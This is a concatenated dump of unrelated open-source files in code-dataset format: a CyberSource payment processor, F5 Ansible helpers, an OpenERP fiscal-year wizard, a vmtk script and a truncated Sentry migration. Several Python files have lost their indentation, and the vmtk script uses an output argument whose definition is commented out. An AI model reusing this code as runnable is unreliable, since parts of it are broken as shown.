http://apps.cybersource.com/library/documentation/dev_guides/Secure_Acceptance_WM/Secure_Acceptance_WM.pdf.
"""
NAME = 'cybersource'
PCI_FIELDS = ('card_cvn', 'card_expiry_date', 'card_number', 'card_type',)
def __init__(self, site):
"""
Constructs a new instance of the CyberSource processor.
Raises:
KeyError: If no settings configured for this payment processor
AttributeError: If LANGUAGE_CODE setting is not set.
"""
super(Cybersource, self).__init__(site)
configuration = self.configuration
self.soap_api_url = configuration['soap_api_url']
self.merchant_id = configuration['merchant_id']
self.transaction_key = configuration['transaction_key']
self.send_level_2_3_details = configuration.get('send_level_2_3_details', True)
self.language_code = settings.LANGUAGE_CODE
# Secure Acceptance parameters
# NOTE: Silent Order POST is the preferred method of checkout as it allows us to completely control
# the checkout UX. Secure Acceptance, on the other hand, redirects the purchaser to a page controlled
# by CyberSource.
self.profile_id = configuration.get('profile_id')
self.access_key = configuration.get('access_key')
self.secret_key = configuration.get('secret_key')
self.payment_page_url = configuration.get('payment_page_url')
# Silent Order POST parameters
self.sop_profile_id = configuration.get('sop_profile_id')
self.sop_access_key = configuration.get('sop_access_key')
self.sop_secret_key = configuration.get('sop_secret_key')
self.sop_payment_page_url = configuration.get('sop_payment_page_url')
sa_configured = all((self.access_key, self.payment_page_url, self.profile_id, self.secret_key))
sop_configured = all([self.sop_access_key, self.sop_payment_page_url, self.sop_profile_id, self.sop_secret_key])
assert sop_configured or sa_configured, \
'CyberSource processor must be configured for Silent Order POST and/or Secure Acceptance'
# Apple Pay configuration
self.apple_pay_enabled = self.site.siteconfiguration.enable_apple_pay
self.apple_pay_merchant_identifier = configuration.get('apple_pay_merchant_identifier', '')
self.apple_pay_merchant_id_certificate_path = configuration.get('apple_pay_merchant_id_certificate_path', '')
self.apple_pay_country_code = configuration.get('apple_pay_country_code', '')
@property
def cancel_page_url(self):
return get_ecommerce_url(self.configuration['cancel_checkout_path'])
@property
def client_side_payment_url(self):
return self.sop_payment_page_url
def get_transaction_parameters(self, basket, request=None, use_client_side_checkout=False, **kwargs):
"""
Generate a dictionary of signed parameters CyberSource requires to complete a transaction.
Arguments:
basket (Basket): The basket of products being purchased.
request (Request, optional): A Request object which could be used to construct an absolute URL; not
used by this method.
use_client_side_checkout (bool, optional): Indicates if the Silent Order POST profile should be used.
**kwargs: Additional parameters.
Keyword Arguments:
extra_parameters (dict): Additional signed parameters that should be included in the signature
and returned dict. Note that these parameters will override any default values.
Returns:
dict: CyberSource-specific parameters required to complete a transaction, including a signature.
"""
sop_config_values = (self.sop_access_key, self.sop_payment_page_url, self.sop_profile_id, self.sop_secret_key,)
if use_client_side_checkout and not all(sop_config_values):
raise ProcessorMisconfiguredError(
'CyberSource Silent Order POST cannot be used unless a profile ID, access key, '
'secret key, and payment page URL are ALL configured in settings.'
)
parameters = self._generate_parameters(basket, use_client_side_checkout, **kwargs)
# Sign all fields
parameters['signed_field_names'] = ','.join(sorted(parameters.keys()))
parameters['signature'] = self._generate_signature(parameters, use_client_side_checkout)
payment_page_url = self.sop_payment_page_url if use_client_side_checkout else self.payment_page_url
parameters['payment_page_url'] = payment_page_url
return parameters
def _generate_parameters(self, basket, use_sop_profile, **kwargs):
""" Generates the parameters dict.
A signature is NOT included in the parameters.
Arguments:
basket (Basket): Basket from which the pricing and item details are pulled.
use_sop_profile (bool, optional): Indicates if the Silent Order POST profile should be used.
**kwargs: Additional parameters to add to the generated dict.
Returns:
dict: Dictionary containing the payment parameters that should be sent to CyberSource.
"""
site = basket.site
access_key = self.access_key
profile_id = self.profile_id
if use_sop_profile:
access_key = self.sop_access_key
profile_id = self.sop_profile_id
parameters = {
'access_key': access_key,
'profile_id': profile_id,
'transaction_uuid': uuid.uuid4().hex,
'signed_field_names': '',
'unsigned_field_names': '',
'signed_date_time': datetime.datetime.utcnow().strftime(ISO_8601_FORMAT),
'locale': self.language_code,
'transaction_type': 'sale',
'reference_number': basket.order_number,
'amount': str(basket.total_incl_tax),
'currency': basket.currency,
'override_custom_receipt_page': get_receipt_page_url(
site_configuration=site.siteconfiguration,
order_number=basket.order_number,
override_url=site.siteconfiguration.build_ecommerce_url(
reverse('cybersource:redirect')
),
disable_back_button=True,
),
'override_custom_cancel_page': self.cancel_page_url,
}
extra_data = []
# Level 2/3 details
if self.send_level_2_3_details:
parameters['amex_data_taa1'] = site.name
parameters['purchasing_level'] = '3'
parameters['line_item_count'] = basket.all_lines().count()
            # Note (CCB): This field (purchase order) is required for Visa
            # but is not actually used by us or exposed on the order form.
parameters['user_po'] = 'BLANK'
# Add a parameter specifying the basket's program, None if not present.
# This program UUID will *always* be in the merchant_defined_data1, if exists.
program_uuid = get_basket_program_uuid(basket)
if program_uuid:
extra_data.append("program,{program_uuid}".format(program_uuid=program_uuid))
else:
extra_data.append(None)
for index, line in enumerate(basket.all_lines()):
parameters['item_{}_code'.format(index)] = line.product.get_product_class().slug
parameters['item_{}_discount_amount '.format(index)] = str(line.discount_value)
# Note (CCB): This indicates that the total_amount field below includes tax.
parameters['item_{}_gross_net_indicator'.format(index)] = 'Y'
parameters['item_{}_name'.format(index)] = clean_field_value(line.product.title)
parameters['item_{}_quantity'.format(index)] = line.quantity
parameters['item_{}_sku'.format(index)] = line.stockrecord.partner_sku
parameters['item_{}_tax_amount'.format(index)] = str(line.line_tax)
parameters['item_{}_tax_rate'.format(index)] = '0'
parameters['item_{}_total_amount '.format(index)] = str(line.line_price_incl_tax_incl_discounts)
# Note (CCB): Course seat is not a unit of measure. Use item (ITM).
parameters['item_{}_unit_of_measure'.format(index)] = 'ITM'
parameters['item_{}_unit_price'.format(index)] = str(line.unit_price_incl_tax)
# For each basket line having a course product, add course_id and course type
# as an extra CSV-formatted parameter sent to Cybersource.
# These extra course parameters will be in parameters merchant_defined_data2+.
line_course = line.product.course
if line_course:
extra_data.append("course,{course_id},{course_type}".format(
course_id=line_course.id if line_course else None,
course_type=line_course.type if line_course else None
))
# Only send consumer_id for hosted payment page
if not use_sop_profile:
parameters['consumer_id'] = basket.owner.username
# Add the extra parameters
parameters.update(kwargs.get('extra_parameters', {}))
# Mitigate PCI compliance issues
signed_field_names = list(parameters.keys())
if any(pci_field in signed_field_names for pci_field in self.PCI_FIELDS):
raise PCIViolation('One or more PCI-related fields is contained in the payment parameters. '
'This service is NOT PCI-compliant! Deactivate this service immediately!')
if extra_data:
# CyberSource allows us to send additional data in merchant_defined_data# fields.
for num, item in enumerate(extra_data, start=1):
if item:
key = u"merchant_defined_data{num}".format(num=num)
parameters[key] = item
return parameters
def handle_processor_response(self, response, basket=None):
"""
Handle a response (i.e., "merchant notification") from CyberSource.
Arguments:
response (dict): Dictionary of parameters received from the payment processor.
Keyword Arguments:
basket (Basket): Basket being purchased via the payment processor.
Raises:
AuthorizationError: Authorization was declined.
UserCancelled: Indicates the user cancelled payment.
TransactionDeclined: Indicates the payment was declined by the processor.
GatewayError: Indicates a general error on the part of the processor.
            InvalidCybersourceDecision: Indicates an unknown decision value.
Known values are ACCEPT, CANCEL, DECLINE, ERROR, REVIEW.
PartialAuthorizationError: Indicates only a portion of the requested amount was authorized.
Returns:
HandledProcessorResponse
"""
# Validate the signature
if not self.is_signature_valid(response):
raise InvalidSignatureError
# Raise an exception for payments that were not accepted. Consuming code should be responsible for handling
# and logging the exception.
decision = response['decision'].lower()
if decision != 'accept':
reason_code = int(response['reason_code'])
if decision == 'error' and reason_code == 104:
                # This means the user submitted the payment request twice within 15 minutes.
                # We need to check whether the user's first payment notification was handled successfully
                # and the user already has an order. If an order exists, we raise DuplicateReferenceNumber;
                # otherwise we continue the order creation process so the user is upgraded to the correct
                # course mode.
if Order.objects.filter(number=response['req_reference_number']).exists():
raise DuplicateReferenceNumber
logger.info(
'Received duplicate CyberSource payment notification for basket [%d] which is not associated '
'with any existing order. Continuing to validation and order creation processes.',
basket.id,
)
else:
raise {
'cancel': UserCancelled,
'decline': TransactionDeclined,
'error': GatewayError,
'review': AuthorizationError,
}.get(decision, InvalidCybersourceDecision)
transaction_id = response.get('transaction_id', '') # Error Notifications do not include a transaction id.
if transaction_id and decision == 'accept':
if Order.objects.filter(number=response['req_reference_number']).exists():
if PaymentProcessorResponse.objects.filter(transaction_id=transaction_id).exists():
raise RedundantPaymentNotificationError
raise ExcessivePaymentForOrderError
if 'auth_amount' in response and response['auth_amount'] and response['auth_amount'] != response['req_amount']:
# Raise an exception if the authorized amount differs from the requested amount.
# Note (CCB): We should never reach this point in production since partial authorization is disabled
# for our account, and should remain that way until we have a proper solution to allowing users to
# complete authorization for the entire order
raise PartialAuthorizationError
currency = response['req_currency']
total = Decimal(response['req_amount'])
card_number = response['req_card_number']
card_type = CYBERSOURCE_CARD_TYPE_MAP.get(response['req_card_type'])
return HandledProcessorResponse(
transaction_id=transaction_id,
total=total,
currency=currency,
card_number=card_number,
card_type=card_type
)
def _generate_signature(self, parameters, use_sop_profile):
"""
Sign the contents of the provided transaction parameters dictionary.
This allows CyberSource to verify that the transaction parameters have not been tampered with
during transit. The parameters dictionary should contain a key 'signed_field_names' which CyberSource
uses to validate the signature. The message to be signed must contain parameter keys and values ordered
in the same way they appear in 'signed_field_names'.
We also use this signature to verify that the signature we get back from Cybersource is valid for
the parameters that they are giving to us.
Arguments:
parameters (dict): A dictionary of transaction parameters.
use_sop_profile (bool): Indicates if the Silent Order POST profile should be used.
Returns:
unicode: the signature for the given parameters
"""
order_number = None
basket_id = None
if 'reference_number' in parameters:
order_number = parameters['reference_number']
elif 'req_reference_number' in parameters:
order_number = parameters['req_reference_number']
if order_number:
basket_id = str(OrderNumberGenerator().basket_id(order_number))
logger.info(
'Signing CyberSource payment data for basket [%s], to become order [%s].',
basket_id,
order_number
)
keys = parameters['signed_field_names'].split(',')
secret_key = self.sop_secret_key if use_sop_profile else self.secret_key
# Generate a comma-separated list of keys and values to be signed. CyberSource refers to this
# as a 'Version 1' signature in their documentation.
message = ','.join(['{key}={value}'.format(key=key, value=parameters.get(key)) for key in keys])
return sign(message, secret_key)
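    # --- Editor's illustrative sketch (not part of the original processor) ---
    # Mirrors the 'Version 1' message layout built in _generate_signature above:
    # key=value pairs joined by commas, ordered exactly as listed in
    # signed_field_names. The parameter values are made up.
    @staticmethod
    def _example_signed_message(parameters):
        # For {'amount': '40.00', 'currency': 'USD',
        #      'signed_field_names': 'amount,currency,signed_field_names'}
        # this returns
        # 'amount=40.00,currency=USD,signed_field_names=amount,currency,signed_field_names'
        keys = parameters['signed_field_names'].split(',')
        return ','.join('{key}={value}'.format(key=key, value=parameters.get(key))
                        for key in keys)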
def is_signature_valid(self, response):
"""Returns a boolean indicating if the response's signature (indicating potential tampering) is valid."""
req_profile_id = response.get('req_profile_id')
if not req_profile_id:
return False
use_sop_profile = req_profile_id == self.sop_profile_id
return response and (self._generate_signature(response, use_sop_profile) == response.get('signature'))
def issue_credit(self, order_number, basket, reference_number, amount, currency):
try:
client = Client(self.soap_api_url, wsse=UsernameToken(self.merchant_id, self.transaction_key))
credit_service = {
'captureRequestID': reference_number,
'run': 'true',
}
purchase_totals = {
'currency': currency,
'grandTotalAmount': six.text_type(amount),
}
response = client.service.runTransaction(
merchantID=self.merchant_id,
merchantReferenceCode=order_number,
orderRequestToken=reference_number,
ccCreditService=credit_service,
purchaseTotals=purchase_totals
)
request_id = response.requestID
ppr = self.record_processor_response(serialize_object(response), transaction_id=request_id,
basket=basket)
        except Exception:  # wrap any SOAP/transport failure in a GatewayError below
msg = 'An error occurred while attempting to issue a credit (via CyberSource) for order [{}].'.format(
order_number)
logger.exception(msg)
raise GatewayError(msg)
if response.decision == 'ACCEPT':
return request_id
raise GatewayError(
'Failed to issue CyberSource credit for order [{order_number}]. '
'Complete response has been recorded in entry [{response_id}]'.format(
order_number=order_number, response_id=ppr.id))
def request_apple_pay_authorization(self, basket, billing_address, payment_token):
"""
Authorizes an Apple Pay payment.
For details on the process, see the CyberSource Simple Order API documentation at
https://www.cybersource.com/developers/integration_methods/apple_pay/.
Args:
basket (Basket)
billing_address (BillingAddress)
payment_token (dict)
Returns:
HandledProcessorResponse
Raises:
GatewayError
"""
try:
client = Client(self.soap_api_url, wsse=UsernameToken(self.merchant_id, self.transaction_key))
card_type = APPLE_PAY_CYBERSOURCE_CARD_TYPE_MAP[payment_token['paymentMethod']['network'].lower()]
bill_to = {
'firstName': billing_address.first_name,
'lastName': billing_address.last_name,
'street1': billing_address.line1,
'street2': billing_address.line2,
'city': billing_address.line4,
'state': billing_address.state,
'postalCode': billing_address.postcode,
'country': billing_address.country.iso_3166_1_a2,
'email': basket.owner.email,
}
purchase_totals = {
'currency': basket.currency,
'grandTotalAmount': str(basket.total_incl_tax),
}
encrypted_payment = {
'descriptor': 'RklEPUNPTU1PTi5BUFBMRS5JTkFQUC5QQVlNRU5U',
'data': base64.b64encode(json.dumps(payment_token['paymentData']).encode('utf-8')),
'encoding': 'Base64',
}
card = {
'cardType': card_type,
}
auth_service = {
'run': 'true',
}
capture_service = {
'run': 'true',
}
# Enable Export Compliance for SDN validation, amongst other checks.
# See https://www.cybersource.com/products/fraud_management/export_compliance/
export_service = {
'run': 'true',
}
item = [{
'id': index,
'productCode': line.product.get_product_class().slug,
'productName': clean_field_value(line.product.title),
'quantity': line.quantity,
'productSKU': line.stockrecord.partner_sku,
'taxAmount': str(line.line_tax),
'unitPrice': str(line.unit_price_incl_tax),
} for index, line in enumerate(basket.all_lines())]
response = client.service.runTransaction(
merchantID=self.merchant_id,
merchantReferenceCode=basket.order_number,
billTo=bill_to,
purchaseTotals=purchase_totals,
encryptedPayment=encrypted_payment,
card=card,
ccAuthService=auth_service,
ccCaptureService=capture_service,
exportService=export_service,
paymentSolution='001',
item=item,
)
        except Exception:  # wrap any SOAP/transport failure in a GatewayError below
            msg = 'An error occurred while authorizing an Apple Pay payment (via CyberSource) for basket [{}]'.format(basket.id)
logger.exception(msg)
raise GatewayError(msg)
request_id = response.requestID
ppr = self.record_processor_response(serialize_object(response), transaction_id=request_id, basket=basket)
if response.decision == 'ACCEPT':
currency = basket.currency
total = basket.total_incl_tax
transaction_id = request_id
return HandledProcessorResponse(
transaction_id=transaction_id,
total=total,
currency=currency,
card_number='Apple Pay',
card_type=CYBERSOURCE_CARD_TYPE_MAP.get(card_type)
)
msg = ('CyberSource rejected an Apple Pay authorization request for basket [{basket_id}]. '
'Complete response has been recorded in entry [{response_id}]')
msg = msg.format(basket_id=basket.id, response_id=ppr.id)
logger.warning(msg)
raise GatewayError(msg)
| agpl-3.0 | 4,043,310,190,785,671,700 | 44.665414 | 120 | 0.625093 | false |
ptisserand/ansible | lib/ansible/module_utils/network/f5/common.py | 14 | 9070 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2017 F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback
from ansible.module_utils.connection import exec_command
from ansible.module_utils.network.common.utils import to_list, ComplexList
from ansible.module_utils.six import iteritems
from collections import defaultdict
try:
from icontrol.exceptions import iControlUnexpectedHTTPError
HAS_F5SDK = True
except ImportError:
HAS_F5SDK = False
f5_provider_spec = {
'server': dict(
fallback=(env_fallback, ['F5_SERVER'])
),
'server_port': dict(
type='int',
default=443,
fallback=(env_fallback, ['F5_SERVER_PORT'])
),
'user': dict(
fallback=(env_fallback, ['F5_USER', 'ANSIBLE_NET_USERNAME'])
),
'password': dict(
no_log=True,
aliases=['pass', 'pwd'],
fallback=(env_fallback, ['F5_PASSWORD', 'ANSIBLE_NET_PASSWORD'])
),
'ssh_keyfile': dict(
fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']),
type='path'
),
'validate_certs': dict(
type='bool',
fallback=(env_fallback, ['F5_VALIDATE_CERTS'])
),
'transport': dict(
default='rest',
choices=['cli', 'rest']
),
'timeout': dict(type='int'),
}
f5_argument_spec = {
'provider': dict(type='dict', options=f5_provider_spec),
}
f5_top_spec = {
'server': dict(
removed_in_version=2.9,
fallback=(env_fallback, ['F5_SERVER'])
),
'user': dict(
removed_in_version=2.9,
fallback=(env_fallback, ['F5_USER', 'ANSIBLE_NET_USERNAME'])
),
'password': dict(
removed_in_version=2.9,
no_log=True,
aliases=['pass', 'pwd'],
fallback=(env_fallback, ['F5_PASSWORD', 'ANSIBLE_NET_PASSWORD'])
),
'validate_certs': dict(
removed_in_version=2.9,
type='bool',
fallback=(env_fallback, ['F5_VALIDATE_CERTS'])
),
'server_port': dict(
removed_in_version=2.9,
type='int',
default=443,
fallback=(env_fallback, ['F5_SERVER_PORT'])
),
'transport': dict(
removed_in_version=2.9,
default='rest',
choices=['cli', 'rest']
)
}
f5_argument_spec.update(f5_top_spec)
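# Illustrative (hypothetical) use of these specs from a module's main() function --
# not part of the original file; the extra 'name' argument is made up for the sketch:
#   from ansible.module_utils.basic import AnsibleModule
#   argument_spec = dict(name=dict(required=True))
#   argument_spec.update(f5_argument_spec)
#   module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)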
def get_provider_argspec():
return f5_provider_spec
def load_params(params):
provider = params.get('provider') or dict()
for key, value in iteritems(provider):
if key in f5_argument_spec:
if params.get(key) is None and value is not None:
params[key] = value
# Fully Qualified name (with the partition)
def fqdn_name(partition, value):
if value is not None and not value.startswith('/'):
return '/{0}/{1}'.format(partition, value)
return value
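# For example (illustrative values): fqdn_name('Common', 'pool1') returns '/Common/pool1',
# while an already-qualified '/Common/pool1' is returned unchanged.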
# Fully Qualified name (with partition) for a list
def fq_list_names(partition, list_names):
if list_names is None:
return None
return map(lambda x: fqdn_name(partition, x), list_names)
def to_commands(module, commands):
spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
transform = ComplexList(spec, module)
return transform(commands)
def run_commands(module, commands, check_rc=True):
responses = list()
commands = to_commands(module, to_list(commands))
for cmd in commands:
cmd = module.jsonify(cmd)
rc, out, err = exec_command(module, cmd)
if check_rc and rc != 0:
raise F5ModuleError(to_text(err, errors='surrogate_then_replace'))
responses.append(to_text(out, errors='surrogate_then_replace'))
return responses
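# Illustrative call (hypothetical command strings): plain strings and dicts may be mixed,
# since to_commands() normalizes both forms:
#   output = run_commands(module, ['show sys version',
#                                  {'command': 'list ltm pool', 'prompt': None, 'answer': None}])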
def cleanup_tokens(client):
try:
resource = client.api.shared.authz.tokens_s.token.load(
name=client.api.icrs.token
)
resource.delete()
except Exception:
pass
def is_cli(module):
transport = module.params['transport']
provider_transport = (module.params['provider'] or {}).get('transport')
result = 'cli' in (transport, provider_transport)
return result
def is_valid_hostname(host):
"""Reasonable attempt at validating a hostname
Compiled from various paragraphs outlined here
https://tools.ietf.org/html/rfc3696#section-2
https://tools.ietf.org/html/rfc1123
Notably,
* Host software MUST handle host names of up to 63 characters and
SHOULD handle host names of up to 255 characters.
* The "LDH rule", after the characters that it permits. (letters, digits, hyphen)
* If the hyphen is used, it is not permitted to appear at
either the beginning or end of a label
:param host:
:return:
"""
if len(host) > 255:
return False
host = host.rstrip(".")
allowed = re.compile(r'(?!-)[A-Z0-9-]{1,63}(?<!-)$', re.IGNORECASE)
result = all(allowed.match(x) for x in host.split("."))
return result
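# Illustrative checks (hypothetical names): is_valid_hostname('bigip-1.example.com') is
# True, while '-bad.example.com' (leading hyphen in a label) and any name longer than
# 255 characters evaluate to False.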
class Noop(object):
"""Represent no-operation required
This class is used in the Difference engine to specify when an attribute
has not changed. Difference attributes may return an instance of this
class as a means to indicate when the attribute has not changed.
The Noop object allows attributes to be set to None when sending updates
to the API. `None` is technically a valid value in some cases (it indicates
that the attribute should be removed from the resource).
"""
pass
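# Sketch of the intended pattern (attribute and variable names are hypothetical):
#   change = difference.compare('description')
#   if isinstance(change, Noop):
#       pass                              # attribute unchanged; leave it out of the update
#   elif change is None:
#       payload['description'] = None     # explicit None asks the API to remove the attribute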
class F5BaseClient(object):
def __init__(self, *args, **kwargs):
self.params = kwargs
load_params(self.params)
self._client = None
@property
def api(self):
raise F5ModuleError("Management root must be used from the concrete product classes.")
def reconnect(self):
"""Attempts to reconnect to a device
The existing token from a ManagementRoot can become invalid if you,
for example, upgrade the device (such as is done in the *_software
        module).
        This method can be used to reconnect to a remote device without
        having to re-instantiate the ArgumentSpec and AnsibleF5Client classes;
        it will use the same values that were initially provided to those
        classes.
:return:
:raises iControlUnexpectedHTTPError
"""
self._client = self.mgmt
class AnsibleF5Parameters(object):
def __init__(self, *args, **kwargs):
self._values = defaultdict(lambda: None)
self._values['__warnings'] = []
self.client = kwargs.pop('client', None)
self._module = kwargs.pop('module', None)
self._params = {}
params = kwargs.pop('params', None)
if params:
self.update(params=params)
self._params.update(params)
def update(self, params=None):
if params:
self._params.update(params)
for k, v in iteritems(params):
if self.api_map is not None and k in self.api_map:
map_key = self.api_map[k]
else:
map_key = k
# Handle weird API parameters like `dns.proxy.__iter__` by
# using a map provided by the module developer
class_attr = getattr(type(self), map_key, None)
if isinstance(class_attr, property):
# There is a mapped value for the api_map key
if class_attr.fset is None:
# If the mapped value does not have
# an associated setter
self._values[map_key] = v
else:
# The mapped value has a setter
setattr(self, map_key, v)
else:
# If the mapped value is not a @property
self._values[map_key] = v
def api_params(self):
result = {}
for api_attribute in self.api_attributes:
if self.api_map is not None and api_attribute in self.api_map:
result[api_attribute] = getattr(self, self.api_map[api_attribute])
else:
result[api_attribute] = getattr(self, api_attribute)
result = self._filter_params(result)
return result
def __getattr__(self, item):
# Ensures that properties that weren't defined, and therefore stashed
# in the `_values` dict, will be retrievable.
return self._values[item]
@property
def partition(self):
if self._values['partition'] is None:
return 'Common'
return self._values['partition'].strip('/')
@partition.setter
def partition(self, value):
self._values['partition'] = value
def _filter_params(self, params):
return dict((k, v) for k, v in iteritems(params) if v is not None)
class F5ModuleError(Exception):
pass
| gpl-3.0 | 1,302,024,279,466,081,800 | 29.641892 | 94 | 0.605292 | false |
ntiufalara/openerp7 | openerp/addons/account/wizard/account_fiscalyear_close_state.py | 35 | 2537 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class account_fiscalyear_close_state(osv.osv_memory):
"""
Closes Account Fiscalyear
"""
_name = "account.fiscalyear.close.state"
_description = "Fiscalyear Close state"
_columns = {
'fy_id': fields.many2one('account.fiscalyear', \
'Fiscal Year to Close', required=True, help="Select a fiscal year to close"),
}
def data_save(self, cr, uid, ids, context=None):
"""
This function close account fiscalyear
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of Account fiscalyear close state’s IDs
"""
for data in self.read(cr, uid, ids, context=context):
fy_id = data['fy_id'][0]
cr.execute('UPDATE account_journal_period ' \
'SET state = %s ' \
'WHERE period_id IN (SELECT id FROM account_period \
WHERE fiscalyear_id = %s)',
('done', fy_id))
cr.execute('UPDATE account_period SET state = %s ' \
'WHERE fiscalyear_id = %s', ('done', fy_id))
cr.execute('UPDATE account_fiscalyear ' \
'SET state = %s WHERE id = %s', ('done', fy_id))
return {'type': 'ir.actions.act_window_close'}
account_fiscalyear_close_state()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| mit | -5,330,334,011,736,422,000 | 40.52459 | 110 | 0.578366 | false |
kayarre/Tools | vmtk/calc_polygon.py | 1 | 1712 |
#!/usr/bin/env python
import vtk
import numpy as np
from vmtk import vmtkscripts
from vmtk import vtkvmtk
import argparse
import copy
# extracts boundary reference systems (centers, normals and radii of the open boundaries) of a surface
def warp_surface(args):
print("warp the surface ")
reader = vmtkscripts.vmtkSurfaceReader()
reader.InputFileName = args.surface
reader.Execute()
Surface = reader.Surface
boundaries = vtkvmtk.vtkvmtkPolyDataBoundaryExtractor()
boundaries.SetInputData(Surface)
boundaries.Update()
boundaryReferenceSystems = vtkvmtk.vtkvmtkBoundaryReferenceSystems()
boundaryReferenceSystems.SetInputData(Surface)
boundaryReferenceSystems.SetBoundaryRadiusArrayName('BoundaryRadius')
boundaryReferenceSystems.SetBoundaryNormalsArrayName('BoundaryNormals')
boundaryReferenceSystems.SetPoint1ArrayName('Point1')
boundaryReferenceSystems.SetPoint2ArrayName('Point2')
boundaryReferenceSystems.Update()
ReferenceSystems = boundaryReferenceSystems.GetOutput()
writer = vmtkscripts.vmtkSurfaceWriter()
writer.OutputFileName = args.file_out
    writer.Input = ReferenceSystems  # the boundary reference systems computed above
writer.Execute()
if __name__=='__main__':
parser = argparse.ArgumentParser(description='estimate vertices for uniform point distribution')
parser.add_argument("-i", dest="surface", required=True, help="input surface file", metavar="FILE")
#parser.add_argument("-o", dest="file_out", required=True, help="output surface file", metavar="FILE")
#parser.add_argument("-s", '--scale', dest="fuzz_scale", type=float, help='how much to fuzz surface ', default=0.08)
args = parser.parse_args()
#print(args)
warp_surface(args)
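# Example invocation (hypothetical file names):
#   python calc_polygon.py -i aneurysm_surface.vtp -o boundary_reference_systems.vtp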
| bsd-2-clause | -482,486,886,400,741,900 | 31.923077 | 121 | 0.744159 | false |
SilentCircle/sentry | src/sentry/migrations/0089_auto__add_accessgroup__add_unique_accessgroup_team_name.py | 3 | 27708 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'AccessGroup'
db.create_table('sentry_accessgroup', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('team', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sentry.Team'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('type', self.gf('django.db.models.fields.IntegerField')(default=50)),
('managed', self.gf('django.db.models.fields.BooleanField')(default=False)),
('data', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('date_added', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal('sentry', ['AccessGroup'])
# Adding M2M table for field projects on 'AccessGroup'
db.create_table('sentry_accessgroup_projects', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('accessgroup', models.ForeignKey(orm['sentry.accessgroup'], null=False)),
('project', models.ForeignKey(orm['sentry.project'], null=False))
))
db.create_unique('sentry_accessgroup_projects', ['accessgroup_id', 'project_id'])
# Adding M2M table for field members on 'AccessGroup'
db.create_table('sentry_accessgroup_members', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('accessgroup', models.ForeignKey(orm['sentry.accessgroup'], null=False)),
('user', models.ForeignKey(orm['auth.user'], null=False))
))
db.create_unique('sentry_accessgroup_members', ['accessgroup_id', 'user_id'])
# Adding unique constraint on 'AccessGroup', fields ['team', 'name']
db.create_unique('sentry_accessgroup', ['team_id', 'name'])
def backwards(self, orm):
# Removing unique constraint on 'AccessGroup', fields ['team', 'name']
db.delete_unique('sentry_accessgroup', ['team_id', 'name'])
# Deleting model 'AccessGroup'
db.delete_table('sentry_accessgroup')
# Removing M2M table for field projects on 'AccessGroup'
db.delete_table('sentry_accessgroup_projects')
# Removing M2M table for field members on 'AccessGroup'
db.delete_table('sentry_accessgroup_members')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
